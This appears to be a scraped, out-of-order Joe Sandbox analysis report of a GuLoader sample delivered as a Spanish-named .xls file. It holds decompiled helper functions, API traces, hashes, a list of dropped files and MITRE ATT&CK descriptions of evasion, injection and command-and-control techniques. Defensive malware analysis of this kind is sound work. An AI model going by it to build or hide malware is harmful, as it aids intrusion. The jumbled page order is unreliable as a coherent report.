Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405f84
0x00405f8e
0x00405f91
0x00405f97
0x00405f98
0x00405f99
0x00405fa1
0x00000000
0x00000000
0x00000000
0x00405fa1
0x00405fa3
0x00405fab

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Roaming,0040313C,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\venxajlddf.exe,C:\Users\user\AppData\Roaming\venxajlddf.exe,80000000,00000003), ref: 00405F89
CharPrevW.USER32(80000000,00000000), ref: 00405F99

Strings

C:\Users\user\AppData\Roaming, xrefs: 00405F83

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Roaming
API String ID: 2709904686-2707566632
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004060cd
0x004060cf
0x004060d2
0x004060fe
0x004060d7
0x004060e0
0x004060e5
0x004060f0
0x004060f3
0x0040610f
0x004060f5
0x004060fc
0x00000000
0x004060fc
0x00406108
0x0040610c
0x0040610c
0x00406106
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
CharNextA.USER32(00000000), ref: 004060F6
lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\869A5E80.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91FDCC81.png

C:\Users\user\AppData\Local\Temp\APPEASINGLY.ned

C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe

C:\Users\user\AppData\Local\Temp\BD3.tmp

C:\Users\user\AppData\Local\Temp\Fecundify.lnk

C:\Users\user\AppData\Local\Temp\MsMpLics.dll

C:\Users\user\AppData\Local\Temp\REPREHENSION.Deb

C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll

C:\Users\user\AppData\Local\Temp\Undergangsstemningen.ini

C:\Users\user\AppData\Local\Temp\avutil-54.dll

C:\Users\user\AppData\Local\Temp\folder-publicshare.png

C:\Users\user\AppData\Local\Temp\krista.ini

C:\Users\user\AppData\Local\Temp\lang-1045.dll

Windows Analysis Report
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Function 036D0557 Relevance: 4.6, APIs: 3, Instructions: 77
libraryCOMMON

Function 036D04D7 Relevance: 3.1, APIs: 2, Instructions: 123
libraryfilenetworkCOMMON

Function 036D060F Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Function 036D05C4 Relevance: 1.6, APIs: 1, Instructions: 58
filenetworkCOMMON

Function 036D0571 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Function 036D062F Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 036D0636 Relevance: .0, Instructions: 14
COMMON

Function 036D04A2 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450
stringfilecomCOMMON

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 73BF1BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre